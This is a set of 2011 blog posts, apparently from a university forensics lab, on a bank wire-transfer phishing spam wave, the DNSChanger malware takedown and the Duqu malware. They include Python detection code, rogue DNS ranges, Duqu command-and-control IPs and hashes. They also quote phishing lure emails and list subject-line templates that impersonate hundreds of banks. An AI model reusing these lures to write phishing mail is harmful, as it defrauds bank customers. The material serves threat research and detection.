ACH / WireTransfer Failed spam goes crazy!

by UAB's Director of Research in Computer Forensics on November 16, 2011

in SBN

Yesterday we saw two HUGE spam campaigns, still running this morning, that use variations on "your wire transfer failed" as subject lines.

We saw at least 86,197 copies of this spam on November 15th, that I am mentally dividing into "Named Institution / zfin" spam and "random intermediary" spam.

The "zfin" spam was far more prevalent, with 62,331 copies of the 86,197 copies pointing to a URL that contained "zfin.php" in the path.

The "zfin" spam has a mail message that reads something like this:

Dear Account Holder,

Money Transfer sent by you or on your behalf was hold by our bank.

Transaction ID: 17019302204565051
Current status of transaction: on hold

Please review transaction details as soon as possible.

N. B. Abel
Treasury Management


The "non-zfin" email has a message that reads something like this:

Dear Bank Account Operator,
I regret to inform you that Wire transfer initiated by you or on your behalf was hold by us.

Transaction: 238006864683285
Current transaction status: Pending

Please review transaction details as soon as possible.


In both versions a very large number of "intermediary" spam domains are used. These are "page forwarders" that have been placed on compromised web servers. The hackers have gathered a very large list of website user IDs and passwords that let them place new content at will, without the knowledge of the webmaster. They log in as the webmaster, upload their "forwarder" page, and then use that newly created page as the destination in the spam messages.

More than 15% of the spam that we saw at the UAB Spam Data Mine yesterday belonged to this pair of campaigns, and the volume is still extremely high this morning.

Many of the emails used these spoofed "from" domains, with the number of messages seen for each:

uba.org 5785
lba.org 5762
aba.com 5724
bankersonline.com 5681
cbanet.org 5674
vabankers.org 5672
mbaa.org 5645
nationalbankers.org 5634
icba.org 5620
allbankers.org 5604
fiba.net 5532
direct.nacha.org 5024


Forty-seven destinations were used by the "zfin" spam, the variant that names a financial institution in the subject line. These destinations heavily favored Argentinian domain names.

By combining a "prefix" with an "institution name", more than 10,000 unique subject lines were created; 702 financial institutions have been named so far.

The prefix for the subject is selected from this list:

ACH debit transfer was hold by
ACH debit transfer was not accepted by
ACH payroll payment was hold by
ACH payroll payment was not accepted by
ACH Transfer was hold by
ACH Transfer was not accepted by
Bill Payment was hold by
Bill Payment was not accepted by
Domestic Wire Transfer was hold by
Domestic Wire Transfer was not accepted by
Funds transfer was hold by
Funds transfer was not accepted by
Money Transfer was hold by
Money Transfer was not accepted by
Payment was hold by
Payment was not accepted by
Wire Transfer was hold by
Wire Transfer was not accepted by

and is then suffixed with a financial institution name from the list found at the end of this post.

The "non-zfin" form of the spam uses one of these subjects (a random number is denoted by #RND#):

ACH payment canceled
ACH payment rejected
ACH transaction canceled
ACH Transfer canceled
ACH transfer rejected
ACH transfer was hold by our bank
Declined Direct Deposit payment
Direct Deposit payment ID #RND# rejected
Direct Deposit payment was cancelled
Direct Deposit payment was declined
Direct Deposit payment was rejected
Disallowed Direct Deposit payment
Fwd: Wire Transfer (#RND#)
Fwd: Wire Transfer Confirmation
Fwd: Wire Transfer Confirmation (FED #RND#)
Fwd: Your Wire Transfer
Notification about the rejected Direct Deposit payment
Payment ID #RND# rejected
Re: your Direct Deposit payment ID #RND#
Regarding your Direct Deposit via ACH
Rejected ACH payment
Rejected ACH transaction
Rejected ACH transfer
Urgent notice about your electronic payments
Your ACH transaction
Your ACH transfer
Your Direct Deposit payment ID #RND# was declined
Your Direct Deposit payment via ACH was declined
Your Direct Deposit payments were disallowed
Your Direct Deposit payments were rejected
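
As an added example (not the author's tooling or the UAB Spam Data Mine's code), the matcher below encodes both subject template sets above, the prefix-plus-institution construction of the "zfin" variant and the fixed "non-zfin" templates with their #RND# slots, together with the zfin.php path indicator, so a mail filter can tag messages by variant and tally the impersonated institutions. The hostnames in the sample feed are constructed placeholders, not hosts named in the post.

```python
"""Subject-line and landing-URL matcher for the two ACH / wire-transfer spam
variants described in the post. Added example, not the UAB Spam Data Mine's code."""
import re
from collections import Counter
from urllib.parse import urlparse

# "zfin" subjects are <noun phrase> + ("was hold by" | "was not accepted by") + <institution>.
# The 9 x 2 combinations below reproduce the 18 prefixes listed in the post.
ZFIN_NOUNS = ["ACH debit transfer", "ACH payroll payment", "ACH Transfer",
              "Bill Payment", "Domestic Wire Transfer", "Funds transfer",
              "Money Transfer", "Payment", "Wire Transfer"]
ZFIN_VERBS = ["was hold by", "was not accepted by"]
ZFIN_PREFIXES = [f"{noun} {verb}" for noun in ZFIN_NOUNS for verb in ZFIN_VERBS]

# "non-zfin" subjects are fixed templates; #RND# stands for a random number.
NONZFIN_TEMPLATES = [
    "ACH payment canceled", "ACH payment rejected", "ACH transaction canceled",
    "ACH Transfer canceled", "ACH transfer rejected",
    "ACH transfer was hold by our bank", "Declined Direct Deposit payment",
    "Direct Deposit payment ID #RND# rejected", "Direct Deposit payment was cancelled",
    "Direct Deposit payment was declined", "Direct Deposit payment was rejected",
    "Disallowed Direct Deposit payment", "Fwd: Wire Transfer (#RND#)",
    "Fwd: Wire Transfer Confirmation", "Fwd: Wire Transfer Confirmation (FED #RND#)",
    "Fwd: Your Wire Transfer", "Notification about the rejected Direct Deposit payment",
    "Payment ID #RND# rejected", "Re: your Direct Deposit payment ID #RND#",
    "Regarding your Direct Deposit via ACH", "Rejected ACH payment",
    "Rejected ACH transaction", "Rejected ACH transfer",
    "Urgent notice about your electronic payments", "Your ACH transaction",
    "Your ACH transfer", "Your Direct Deposit payment ID #RND# was declined",
    "Your Direct Deposit payment via ACH was declined",
    "Your Direct Deposit payments were disallowed",
    "Your Direct Deposit payments were rejected",
]


def template_to_regex(template):
    """Anchored, case-insensitive regex for a template; each #RND# matches a digit run."""
    literal_parts = [re.escape(part) for part in template.split("#RND#")]
    return re.compile("^" + r"\d+".join(literal_parts) + "$", re.IGNORECASE)


NONZFIN_REGEXES = [template_to_regex(t) for t in NONZFIN_TEMPLATES]
ZFIN_REGEX = re.compile(
    "^(?:" + "|".join(re.escape(p) for p in ZFIN_PREFIXES) + r")\s+(?P<institution>.+)$",
    re.IGNORECASE,
)


def classify_subject(subject):
    """Return (variant, institution): ('zfin', name), ('non-zfin', None) or (None, None).

    Fixed templates are tested first: "ACH transfer was hold by our bank" would otherwise
    be read as a zfin prefix followed by the institution "our bank".
    """
    normalized = " ".join(subject.split())          # collapse stray whitespace
    if any(rx.match(normalized) for rx in NONZFIN_REGEXES):
        return ("non-zfin", None)
    match = ZFIN_REGEX.match(normalized)
    if match:
        return ("zfin", match.group("institution"))
    return (None, None)


def is_zfin_landing_url(url):
    """True when the URL path ends in /zfin.php (or the one-off /zfin.html form)."""
    if "://" not in url:
        url = "http://" + url          # the post lists host and path without a scheme
    return urlparse(url).path.lower().endswith(("/zfin.php", "/zfin.html"))


def tally(messages):
    """Count messages per variant and per named institution over (subject, url) pairs."""
    variants, institutions = Counter(), Counter()
    for subject, url in messages:
        variant, institution = classify_subject(subject)
        if variant is None and is_zfin_landing_url(url):
            variant = "zfin"            # subject not recognized, but the forwarder path is
        variants[variant or "other"] += 1
        if institution:
            institutions[institution] += 1
    return variants, institutions


# Constructed sample feed; hostnames are placeholders, not hosts named in the post.
SAMPLE_MESSAGES = [
    ("Wire Transfer was hold by Bank of the West", "compromised-host.example/zfin.php"),
    ("ACH payroll payment was not accepted by Bank of the West", "another-host.example/zfin.php"),
    ("Direct Deposit payment ID 238006864683285 rejected", "forwarder.example/~user/k3x9pq/index.html"),
    ("ACH transfer was hold by our bank", "shortener.example/aBc12"),
    ("Re: lunch on Thursday", "https://intranet.example/menu"),
]

if __name__ == "__main__":
    counts, named = tally(SAMPLE_MESSAGES)
    print(counts)   # Counter({'zfin': 2, 'non-zfin': 2, 'other': 1})
    print(named)    # Counter({'Bank of the West': 2})
```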

These spam messages directed users to one of 1962 unique URLs, all of which SEEM to be compromised websites, with the exception of some "free hosting" sites and a handful of URL shortening services; keeping only a single example URL per host computer reduces that list to 671 instances.

====================
List of Financial Institutions used by the "zfin" spam . . .

Elgin Financial Savings Bank
Elmira Savings Bank FSB
Emerald Coast Bank
Englewood Bank
Esse Hypothekenbank
Eureka Bank
Eurohypo Aktiengesellschaft
European American Bank
Evans National Bank
Evertrust Bank
Excel National Bank
Exchange Bank
Fairport Saving Bank
Falcon International Bank
Far East National Bank
Farm Credit Bank of Texas
Farmers and Merchants Bank
Farmers National Bank
Farmers State Bank of Hoffman
Federal Home Loan Bank
Federal Home Loan Bank of Dallas
Federal Land Bank
Federal Reserve Bank of Chicago
Federal Reserve Bank of Dallas
Federal Reserve Bank of New York
Federal Reserve Bank of San Francisco
Federal Trust Bank
Fidelity Federal Bank
Fidelity Federal Savings Bank
Fifth Third Bank
Fireside Bank
First American Bank
First Bank
First Bank and Trust
First Bank and Trust Company
First Bank of Clewiston
First Bank of San Luis Obispo
First California Bank
First Chicago Capital
First Choice Bank
First Citrus Bank
First City Bank
First Commerce Bank
First Commercial Bank
First Commercial Bank of Florida
First Community Bank
First Convenience Bank
First Federal Bank
First Franklin Bank
First General Bank
First Gulf Bank
First Home Bank
First Indiana Bank
First Internet Bank of Indiana
First Mercantile Bank
First Metro Bank
First Mountain Bank
First National Bank
First National Bank and Trust
First National Bank of Abilene
First National Bank of Ashford
First National Bank of Bellville
First National Bank of Brookfield
First National Bank of Central California
First National Bank of Chillicothe
First National Bank of Danville
First National Bank of Dryden
First National Bank of Eagle Lake
First National Bank of Jasper
First National Bank of Marengo
First National Bank of Mineola Texas
First National Bank of North County
First National Bank of Northern California
First National Bank of Northern New York
First National Bank of Paris
First National Bank of San Benito
First National Bank of Scottsboro
First National Bank of Steeleville
First National Bank of Trenton
First National Bank of Valparaiso
First National Bank of Waterloo
First Navy Bank
First Niagara Bank
First Northern Bank
First of America
First Priority Bank
First Regional Bank
First Savings Bank FSB
First SAvings Bank of Hegewisch
First Southern National Bank
First Standard Bank
First State Bank
First State Bank Frankston
First State Bank of Eldorado
First State Bank of Shallowater
First State Bank of the Florida Keys
First State Bank of Western Illinois
First United Bank
First USA Bank
First Victoria National Bank
FirstBank of Palm Desert
Five Star Bank
Flatbush Federal Savings
FLBA of Texas
Florida Choice Bank
Florida First Bank
Folsom Lake Bank
Foothill Independent Bank
Fort Hood National Bank
Founders Bank
Founders Community Bank
Franklin Bank
Fremont Bank
Frontier Bank
Frost Bank
Frost National Bank
Fullerton Community Bank
Gateway National Bank
Geddes Federal Savings
General Bank
Genesee Regional Bank
Gerard Klauer Mattison
Gibraltar Bank
Global Resource Bank
Golden Security Bank
Goleta National Bank
Grabill Bank
Grand Bank of Florida
Grand National Bank
Grapeland State Bank
Guaranty Bank
Guaranty Bond Bank
Guaranty Federal Bank
Gulf State Community Bank
Habib American Bank
Hanmi Bank
Hardware State Bank
Harris Trust and savings Bank
Hendricks County Bank and Trust
Heritage Bank East Bay
Heritage Bank of Central Illinois
Heritage Bank of Commerce
Heritage Bank South Valley
Heritage Commerce Corp
Heritage Land Bank
Heritage National Bank
Hickory Point Bank and Trust
Highwood Bank
Hinsdale Bank and Trust
Hinsdale Bank Trust Co
Home National Bank
Honda Bank
Horizon Bank
HSBC Bank
Hudson Valley Bank
Humboldt Bank Merchant Services
Hypo Real Estate Bank International
Illini State Bank
Imperial Bank
Imperial Capital LLC
Independent National Bank
Independent Online
ING Capital LLC
Intercredit Bank
International Bancshares
Interstate Bank of Oak Forest
Invex Grupo Financiero
Irwin Financial Corporation
Israel Discount Bank of New York
Itasca Bank and Trust Co
Jackson County Bank
Jacksonville Savings Bank
Jefferson Heritage Bank
Jefferson State Bank
Jourdanton State Bank
JP Morgan Chase Bank
Key West Bank
Kookmin Bank
Lafayette Bank And Trust
Lafayette Savings Bank
Lake Forest Bank and Trust
Lake Shore SAvings And Loan
Lamar National Bank
Landmark Bank
LaSalle State Bank
Lavine Financial Capital
Legacy Bank of Texas
Lehman Brothers
Liberty Bank
Liberty Federal Bank
Liberty Federal Savings Bank
Libertyville Bank
LIFE Bank
Lone Star Federal Land Bank Association
Long Island Commercial Bank
Long Island Savings Bank
Los Angeles National Bank
Lubbock National Bank
Luther Burbank Savings
Madison Bank
Malaga Bank
Mansfield Bank
Manufacturers Bank
Marathon National Bank
Marina Bank
Marketplace Bank
Mazon State Bank
Mellon 1st Business Bank
Melon Bank by
Mercantile Bank
Mercantile Trust and Savings Bank
Merchants and Southern Bank
Merchants Bank of California
Merchants Bank of Jackson
Merchants National Bank of Aurora
Meridian Bank
Merrill Lynch
MetroBank
Metropolitan Bank
MFB Financial
Mission Community Bank
Mission Oaks National Bank
Modern Bank
Mohave Community
Mohave State Bank
Monroe County Bank
Montecito Bank and Trust
Moody National Bank
Morgan Stanley
Morton Community Bank
Murphy Wall State Bank
Mutual Federal Savings Bank
Mutual of Omaha Bank
Nara Bank National Association
NatBank
National Bank
National Bank of California
National City Bank
New Century Bank
New South Federal Savings Bank
Nexity Bank
North Coast Bank
North Community Bank
North County Bank
North County Savings Bank
North Houston Bank
North Valley Bank
Northern Trust Bank
Northern Trust Company
Northfield Savings Bank
NorthShore Trust Saving
NorthStar Bank
Oak Brook Bank
Oak Lawn Bank
Oak Valley Community Bank
Oceanic Bank
Oceanmark Bank
Oceanside Bank of Jacksonville
Old Florida Bank
Old National Bank
Old Second Bancorp
Old Second Bank of Aurora
OptimumBank
Ossian State Bank
Oswego Community Bank
our bank
Overton Bank and Trust
Owen County State Bank
Pacesetter Bank
Pacific Crest Bank
Pacific National Bank
Pacific Trust Bank
Palm Desert National Bank
Palmer Bank
Park Avenue Capital
Park National Bank
Partners Bank
PathFinder Bank
Peoples Bank of Graceville
Peoples Bank of Lubbock
Peoples Bank of North Alabama
Peoples National Bank
People's Trust Company
Permanent Federal Savings Bank
Perryton National Bank
Pff Bank Trust
Phillipine National Bank
Pilgrim Bank
Pinnacle Bank
Pioneer Savings Bank
Plains National Bank Financial
Plaza Bank
Plumas Bank
Pna Bank
Pointe Bank
Ponce de Leon Federal Savings Bank
Popular Bank of Florida
Power Project Financing
Premier Valley Bank
Prosperity Bank
Provident Bank
Queens County Savings Bank
Raiffeisen Zentralbank AG
Randolf County Bank
Redding Bank of Commerce
Regents Bank
Reliance Bank
Ridgewood Bank
Ripley County Bank
River City Bank
Riverside National Bank
Robertson Stephens
Rondout Savings Bank
Roseville Banking Center
Roslyn Savings Bank
Royal Oaks Bank
RZB Finance LLC
Salin Bank and Trust Company
San Diego National Bank
San Jose National Bank
Sand Ridge Bank
Santa Barbara Bank and Trust
Santa Monica Bank
Saratoga National Bank
Scott State Bank
Seacoast National Bank
Second Federal Savings
Security Federal Savings Bank
Seneca Federal Savings and Loan
Sierra Vista Bank
Silicon Valley Bank
Silverado Bank
Six Rivers National Bank
Sonoma Valley Bank
South Alabama Bank
South County Bank
South Pointe Bank
Southern California Funding
Southern Security Bank
Southwest Bank
Southwest Bank of Texas
Sovereign Bank
Spencer County Bank
Star Bank
Star Bank of Texas
Star Financial Bank
State Bank of Ashland
State Bank of Countryside
State Bank of India
State Bank of Lizton
State Bank of Long Island
State Bank of Texas
State Bank of The Lakes
State Bank of Waterloo
State Farm
State National Bank of West Texas
Staten Island Savings Bank
Sterling Bank
Sterling National Bank
Stone City Bank
Strategic Partners
Success National Bank
Suffolk County National Bank
Sumitomo Bank of California
Summit Bank
Surety Bank
Synergy Bank
Tallahassee State Bank
TCB Bank
TCF National Bank
Tempo Bank
Terre Haute Savings Bank
Texas Bank
Texas Capital Bank
Texas Champion Bank
Texas First Banks
Texas Independent Bank
Texas Land Bank
Texas State Bank
The Astoria Federal Savings Bank
The Bank
The Bank and Trust
The Carson Medlin Company
The Dime Savings Bank of New York
The First American Investment Banking Corporation
The First National Bank of Hico
The First National Bank of Long Island
The First State Bank of North Dakota
The Foothills Bank
The Gifford State Bank
The Independent Bankers Bank
The Laredo National Bank
The Mechanics Bank
The SAvings Bank of Utica
The South Holland Bank
The State National Bank
The Warwick Savings Bank
TIB Bank of the Keys
Tokai Bank of California
Tompkins County Trust Company
Town North Bank
Tremont SAvings Bank
Troy Bank and Trust
Troy Savings Bank
Trustbank
Ulster Savings Bank
Unicredito Italiano
Union Bank of Arizona
Union Bank of California
Union Federal
Union Federal Savings Bank
Union Planters Bank
Union State Bank
United Bank
United California Bank
United Commercial Bank
United Community Bank
United Fidelity Bank
United Security Bank
United Southern Bank
Universal Bank
Upstate Niagara Cooperative
us
Valley Business Bank
Valley Commerce Bank
Valley Independent Bank
Valrico State Bank
Vantage Bank of Alabama
Ventura County Business Bank
Viewpoint Bank
Village Banc of Naples
Vineyard Bank
Vintage Bank
VirtualBank
Visalia Community Bank
Vista Bank
Walden Savings Bank
Warrington Bank
Washington Federal Bank
Washington Savings and Loan
Wells Fargo Bank
West Coast Bank
West Suburban Bank
Western Financial Bank
Western Security Bank
Western Springs Bank
Western Springs National Bank
Whisperwood National Bank
Wilber National Bank
Wilmington Trust
Wilshire State Bank
Wintrust Financial Corporation
Woodforest National Bank
Worth National Bank
WSFS bank
Yolo Community Bank

==========================


Operation Ghost Click: DNSChanger Malware Ring Dismantled

by UAB's Director of Research in Computer Forensics on November 9, 2011

in SBN

Since 2007 computers around the internet have been suffering from a secret ailment. Sometimes when their owners clicked on a link, they didn't go where they were supposed to go! The problem was caused by a fairly simple piece of malware called a DNSChanger. This family of malware only does one thing -- it changes the DNS settings on your computer from the one that you are supposed to use, to one that a cyber criminal has chosen for you to use.

Today the FBI and NASA's Office of the Inspector General (NASA-OIG) announced "Operation: Ghost Click" and the arrests of six Estonian criminals who have been involved in this scam since 2007.

Those arrested were:

Vladimir Tsastsin
Andrey Taame
Timur Gerassimenko
Dmitri Jegorov
Valeri Aleksejev
Konstantin Poltev
Anton Ivanov

We were especially pleased by the sidebar entitled "Success Through Partnerships".

A complex international investigation such as Operation Ghost Click could only have been successful through the strong working relationships between law enforcement, private industry, and our international partners.

Announcing today’s arrests, Preet Bharara, (above left) U.S. Attorney for the Southern District of New York, praised the investigative work of the FBI, NASA’s Office of Inspector General (OIG), the Estonian Police and Border Guard Board, and he specially thanked the National High Tech Crime Unit of the Dutch National Police Agency. In addition, the FBI and NASA-OIG received assistance from multiple domestic and international private sector partners, including Georgia Tech University, Internet Systems Consortium, Mandiant, National Cyber-Forensics and Training Alliance, Neustar, Spamhaus, Team Cymru, Trend Micro, University of Alabama at Birmingham, and members of an ad hoc group of subject matter experts known as the DNS Changer Working Group (DCWG).


The Manhattan U.S. Attorney's office released a much more detailed announcement with the headline "Manhattan U.S. Attorney Charges Seven Individuals for Engineering Sophisticated Internet Fraud Scheme That Infected Millions of Computers Worldwide and Manipulated Internet Advertising Business: Malware Secretly Re-Routed More Than 4 Million Computers, Generating at Least $14 Million in Fraudulent Advertising Fees for the Defendants".

Congratulations to all who were involved! Especially to the FBI's Botnet Threat Focus Cell, NASA's incredible Office of the Inspector General, the FBI's Southern District of New York office, and those who attended Bar-Con in 2009.

What is DNS? DNS, or Domain Name Services, is what tells your computer how to find the website you are looking for by turning the name you type, such as www.fbi.gov, into an IP address, such as 205.128.73.105. For most users, this happens by asking the Name Server at your Internet Service Provider.

Pay Per Click Fraud

If you were infected by this DNSChanger malware, instead of asking your ISP for that information, you would be asking a criminal. MOST of the time the criminals would simply give you the same answer that your ISP would give you ... but whenever they wanted to make some extra money, they could tell your computer the wrong answer!

In an example taken from the indictment, an infected user goes to Google and types in "itunes". The first link that they are returned shows the destination "www.apple.com/itunes/", which is the real Apple website where someone can download the iTunes software.


(source: Tsastsin Indictment)

When the user on an infected computer clicks the link, the computer asks the criminals' nameserver, which sends it to the wrong computer. In this case, instead of going to "apple.com" the user is sent to "www.idownload-store-music.com", which looks just like the Apple store but charges your credit card to sell you iTunes! The criminals received a payment each time they sent someone to this fake website.

In other examples, the company where the traffic is sent is a legitimate company. For example, H&R Block, the tax preparation people, have an affiliate program. If you have a website, you can put an ad on your website that advertises the H&R Block website. If people click on your ad, you might receive a tiny amount of money, and if they buy something at the H&R Block website, you might receive a larger amount of money. Instead of advertising, the criminals made a link that redirected you to the H&R Block website if you tried to visit www.irs.gov. So, because you were using the criminals' nameserver, if you typed or clicked on "irs.gov" you could be redirected to H&R Block, earning an "affiliate payment" for the criminals!

Ad Replacement


The other way the criminal earned money was to replace your ads with their ads. How does that earn money? The most common way is that when your computer is told to go get an advertisement from a certain website, such as Google or Bing or Yahoo, instead of showing you the advertisement from those organizations, it would show you an ad from an organization that was run by the criminal instead.

In an example from the court documents, a visitor to ESPN's webpage should have seen an advertisement for Dr. Pepper. But when the infected computer visited the webpage, the criminals' nameserver redirected the request to an advertisement for a timeshare instead!

More than 4 million computers in 100 countries, including 500,000 computers in the United States, were infected with this malware. The earnings these young men generated from the false advertisements exceeded $14 million!

Blocking Fake AV


In addition to using the nameserver to send false advertisements, the criminals also used the nameserver to stop infected computers from being able to reach their anti-virus vendors. This prevented the user from being able to install new anti-virus products or to update the definitions on their existing anti-virus products. If the computer attempted to visit any major anti-virus vendor's site, it would simply get an error saying the server was unavailable.

The Charges


All the criminals are charged with:
1. Wire fraud conspiracy
2. Computer intrusion conspiracy
3. Wire fraud
4. Computer intrusion (furthering fraud)
5. Computer intrusion

In addition, the ringleader, Vladimir Tsastsin was charged with:
6. Money laundering
7. Engaging in monetary transactions of value over $10,000 involving fraud proceeds.

So, Are you infected?

The Protective Order associated with this case lists the IP addresses involved in the fake nameserver business.

85.255.112.0 through 85.255.127.255
67.210.0.0 through 67.210.15.255
93.188.160.0 through 93.188.167.255
77.67.83.0 through 77.67.83.255
213.109.64.0 through 213.109.79.255
64.28.176.0 through 64.28.191.255

The FBI has provided a helpful document that explains how to check your DNS settings to see whether you are using one of these "Rogue DNS Servers". See DNSChanger Malware.

If the DNS server your computer is using is on the list, you are encouraged to fill out the form Register as a Victim of DNS Malware.
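To put the ranges above to use, here is an added example (not code from the original post or from the FBI's check document) that reads a host's configured resolvers from /etc/resolv.conf-style text or from "ipconfig /all" output and flags any that fall inside the six ranges. The two inputs in the block are constructed samples, and the ipconfig parser assumes the usual "DNS Servers . . . : address" layout with additional servers on indented continuation lines.

```python
"""Check configured DNS resolvers against the rogue ranges from the Protective Order.

Added example, not code from the original post or the FBI check document.
The six ranges are copied from the post; RESOLV_CONF_SAMPLE and IPCONFIG_SAMPLE
are constructed inputs, not real captures.
"""
import ipaddress
import re

# Rogue DNS server ranges exactly as the Protective Order lists them (first, last).
ROGUE_RANGES = [
    ("85.255.112.0", "85.255.127.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("213.109.64.0", "213.109.79.255"),
    ("64.28.176.0", "64.28.191.255"),
]
_RANGES = [(ipaddress.ip_address(a), ipaddress.ip_address(b)) for a, b in ROGUE_RANGES]


def is_rogue(ip_text):
    """True when ip_text is an IPv4 address inside one of the rogue ranges."""
    try:
        ip = ipaddress.ip_address(ip_text.strip())
    except ValueError:
        return False          # not an IP address at all
    if ip.version != 4:
        return False          # the order lists IPv4 ranges only
    return any(first <= ip <= last for first, last in _RANGES)


def resolvers_from_resolv_conf(text):
    """Extract nameserver addresses from /etc/resolv.conf-style text (Unix, macOS)."""
    found = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].split(";", 1)[0].strip()   # drop comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            found.append(parts[1])
    return found


_DNS_LABEL = re.compile(r"DNS Servers[ .]*:\s*(\S+)")
_CONTINUATION = re.compile(r"^\s+(\S+)\s*$")   # indented line holding one more address


def resolvers_from_ipconfig(text):
    """Extract DNS server addresses from `ipconfig /all` output (Windows).

    Assumed layout: the first server follows the 'DNS Servers . . . :' label and
    further servers sit alone on indented continuation lines until the next label.
    """
    found = []
    in_dns_block = False
    for line in text.splitlines():
        m = _DNS_LABEL.search(line)
        if m:
            found.append(m.group(1))
            in_dns_block = True
            continue
        if in_dns_block:
            c = _CONTINUATION.match(line)
            if c:
                found.append(c.group(1))
                continue
            in_dns_block = False
    return found


def rogue_resolvers(resolvers):
    """Return the subset of resolver addresses that sit inside a rogue range."""
    return [r for r in resolvers if is_rogue(r)]


RESOLV_CONF_SAMPLE = """\
# constructed sample, not a real file
nameserver 85.255.112.36   # inside 85.255.112.0 - 85.255.127.255
nameserver 8.8.8.8
"""

IPCONFIG_SAMPLE = """\
Windows IP Configuration (constructed sample)

Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 192.168.1.10
   DNS Servers . . . . . . . . . . . : 93.188.161.5
                                       192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    for name, found in (("resolv.conf", resolvers_from_resolv_conf(RESOLV_CONF_SAMPLE)),
                        ("ipconfig", resolvers_from_ipconfig(IPCONFIG_SAMPLE))):
        print(name, "resolvers:", found, "rogue:", rogue_resolvers(found))
```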

The criminals used many different data centers, some of which were featured more prominently in the case than others.

Pilosoft, in New York City, known as "The Manhattan Data Center" in the court documents.

ColoSecure, in Chicago, Illinois

ThePlanet, in Houston, Texas

Multacom Corporation, in Canyon County, California

Layered Technologies, in Plano, Texas

Network Operation Center, in Scranton, Pennsylvania

Wholesale Internet, in Kansas City, Missouri

SingleHop, in Chicago, Illinois

PremiaNet, in Las Vegas, Nevada

Interserver, in Secaucus, New Jersey

ISPrime, in Weehawken, New Jersey

Global Net Access, in Atlanta, Georgia

The Challenge

The big challenge faced by this case was this -- if the FBI were to simply "turn off" all of these nameservers, four million computers would no longer be able to find anything on the Internet! If your computer has been programmed by the DNSChanger malware to look up names using the criminals' nameserver, and that nameserver goes away, there is no "fall back" to some other nameserver; your computer just stops being able to look up names! If that had happened, when you typed in "www.facebook.com" your computer would say something like "No Such Server" or "Host Unknown". Then you couldn't play Farmville! How sad!

To address this challenge, the FBI filed a Protective Order that identified all of the Rogue DNS Servers, and assigned the IP addresses belonging to those servers to the Internet Systems Consortium, or ISC. ISC established "replacement DNS servers" that would behave properly, and replaced all of the "Rogue DNS servers" with properly configured DNS servers. After this was accomplished, none of the infected computers would be redirected to the wrong content anymore, and they would once again be able to update their anti-virus software.

The other benefit of this action is that ISC is now in a position to be able to compile a list of the computers that have been infected. Each time a computer uses one of the formerly Rogue DNS servers, ISC will log that action so that we can have accurate knowledge of how many computers have been infected, and this class of victims can be offered assistance.

The Protective Order was approved by the Honorable William H. Pauley III on November 3rd in the Southern District of New York.

The Criminal Companies


The Estonian criminals controlled a number of corporations to enable this activity.

Rove Digital, in Estonia, was a software development company that created and managed the malware.

Tamme Arendus, also in Estonia, was a real estate development business that acquired most of Rove's assets.

SPB Group was the name of the company that leased the Manhattan Data Center from Pilosoft.

Cernel Inc, in California, Internet Path Limited, in New York, Promnet Limited, in Ukraine, ProLite Limited, in Russia, Front Communications, in New York, and others were involved with registering thousands of IP addresses that were used by the criminals for various activities.

Furox Aps (Gathi.com), Onwa Limited (Uttersearch.com), Lintor Limited (Crossnets.com) and others were used to create and broker advertising deals which would be used in the Replacement Ad schemes.


Duqu: You’re safe unless you use TrueType Fonts?

by UAB's Director of Research in Computer Forensics on November 4, 2011

in SBN

Two of the malware analysts in my lab have been complaining to me that the malware they see every day is getting boring - the primary attacks that we see in the largest volume are the same thing over and over and over again.

Let's be thankful for that! The big news in the malware world yesterday came when Microsoft announced a workaround for Duqu, named by researchers in the CrySyS Lab (the Laboratory for Cryptography and System Security at Budapest University of Technology and Economics) because it prefixes some created filenames with the letters "~DQ".

On October 14, 2011, CrySyS contacted Symantec to get some help analyzing the malware, and Symantec released an extremely informative 67 page PDF report called W32.Duqu: The Precursor to the next Stuxnet. (The link is to version 1.3 of the report, updated on November 1, 2011).

There have been two IP addresses confirmed to be associated with Duqu and serving as Command & Control. The first IP was in India - 206.183.111.97. The second was in Hungary - 77.241.93.160. Traffic flow to either of these IP addresses would be a strong positive indicator of a Duqu infection! Both sites are down now.

The first server was announced to be down on October 31st in stories such as this one -- India Shuts Server Linked to Duqu Computer Virus -- which shares some details of a server located at Web Werks, a 200-employee data center.

The second server was at Combell in Belgium -- as described in stories such as this one -- Duqu Hackers Shift to Belgium After India Raid.

Duqu is a data stealing program that shares several blocks of code with Stuxnet. In fact, one of the two pieces of malware we've seen that is described as being Duqu is also detected as Stuxnet by some AV vendors.

Here's a VirusTotal report of the better detected of those pieces of code, which had the MD5 value e1e00c2d5815e4129d8ac503f6fac095. This file is not "Duqu" but is rather "an .exe file related to Duqu" which is a much larger program (this one is only 9k in size).


Non "generic" definitions for this malware included:

Avast: Win32:Duqu-F
Emsisoft: Trojan.Win32.Stuxnet!IK
Ikarus: Trojan.Win32.Stuxnet
Microsoft: Trojan:Win32/Duqu.E
NOD32: probably a variant of Win32/Duqu.A
TrendMicro: TROJ_DUQU.AJ


Symantec mentioned MD5s

9749d38ae9b9ddd81b50aad679ee87ec
Wed Jun 01, 03:25:18 2011
Stealing information

4c804ef67168e90da2c3da58b60c3d16
Mon Oct 17 17:07:47 2011
Reconnaissance module

856a13fcae0407d83499fc9c3dd791ba
Mon Oct 17 16:26:09 2011
Lifespan extender

92aa68425401ffedcfba4235584ad487
Tue Aug 09 21:37:39 2011
Stealing information

In each of those above, the link on the MD5 will show you the VirusTotal report. I find it interesting that TrendMicro consistently names these files "TROJ_SHADOW.AG" which makes me wonder if they had independently discovered this malware family prior to the naming as Duqu by the CrySyS team.

Symantec calls attention to the fact that several of these files show compile dates AFTER the public disclosure of the existence of Duqu.

Delivery Mechanism


Symantec disclosed in their report that one of the infections they were analyzing had been infected via a Word Document that exploited the system using a previously unknown 0-day attack.

We now know from Microsoft more about this exploit. On November 3, 2011, Microsoft released Microsoft Security Advisory (2639658), "Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege". The advisory starts with an executive summary which says, in part:

Microsoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time. This vulnerability is related to the Duqu malware.


